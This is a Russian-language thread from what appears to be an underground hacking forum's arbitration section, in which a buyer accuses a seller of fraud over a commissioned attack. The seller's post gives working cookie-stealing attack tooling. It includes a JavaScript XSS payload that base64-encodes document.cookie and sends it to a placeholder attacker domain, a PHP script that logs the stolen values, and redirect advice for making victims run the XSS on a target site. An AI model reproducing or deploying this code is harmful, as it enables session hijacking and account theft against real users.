What's new
By:
Filters
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Арбитраж @AzurePhoenix Мошенники

T

trex

Light Weight
Депозит
$0
AzurePhoenix
Я хотел бы сообщить об одном человеке как о мошеннике. Мы только что заключили сделку, и я уже отправил ему деньги. Он просто отправил мне что-то из Google, но не выполнил свою часть сделки, как мы обсуждали в начале. Я хочу, чтобы администратор XSS.is проверил историю нашего чата, которую я также отправил администраторам через Telegram, чтобы предоставить доказательства. Я бы хотел, чтобы администратор наказал его.
 
Итак, что он запросил:
Спойлер
11111111.png


Что я ему дал:

Это вставим в XSS
Код: Скопировать в буфер обмена
Code: 
var cookies = document.cookie;
console.log(cookies);
var encodedCookies = btoa(cookies);
console.log(encodedCookies);
document.getElementById("navbarDropdown").innerHTML='<img src=https://тут_домен_ком/?get=" '+encodedCookies+'"></img>';

Так будем принимать куки и записывать в файл
Код: Скопировать в буфер обмена
Code: 
<?php
// Устанавливаем заголовки для разрешения кросс-доменного доступа (CORS)
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
header("Access-Control-Allow-Headers: Content-Type, Authorization");

// Получаем IP-адрес посетителя
$ip = $_SERVER['REMOTE_ADDR'];

// Получаем текущую дату и время
$date = date('Y-m-d H:i:s');

// Получаем все GET параметры
$query_string = $_SERVER['QUERY_STRING'];

// Формируем строку для записи в лог
$log_entry = "[$date] IP: $ip - Query: $query_string" . PHP_EOL;

// Записываем в log.txt
file_put_contents('log.txt', $log_entry, FILE_APPEND);

// Ответ (можно изменить по своему усмотрению)
echo "Запрос записан.";

//base64_decode($encoded_string);
?>

Так как куки у нас отправляются закодированными, нужно их раскодировать из base64
Например на base64decode org

Чтобы перейдя к нему на сайт (на его сайт), укрались куки с другого сайта
Можно сделать просто редирект на страничку сайта с XSS и обратный редирект к нему с уже исполненной XSS (когда куки укрались)
--------------
Меня отвлекли, немного сбился и не то отправил ему.
Не дает ничего объяснить, не дает прислать ему рабочий код, кричит в личке
--------------
Никуда не пропадаю, все будет
 
AzurePhoenix лучше домен убрать из скриншота
trex Через рефлектед хсс без коротких ссылок или без stored CSRF ты вряд ли чего то добъёшься
 
grozdniyandy said:
grozdniyandy сказал(а):
AzurePhoenix лучше домен убрать из скриншота
trex Через рефлектед хсс без коротких ссылок или без stored CSRF ты вряд ли чего то добъёшься
Нажмите, чтобы раскрыть...
Click to expand...
Он выложил его открыто в другой теме
Сейчас я ему сделаю
 
You must log in or register to reply here.
Top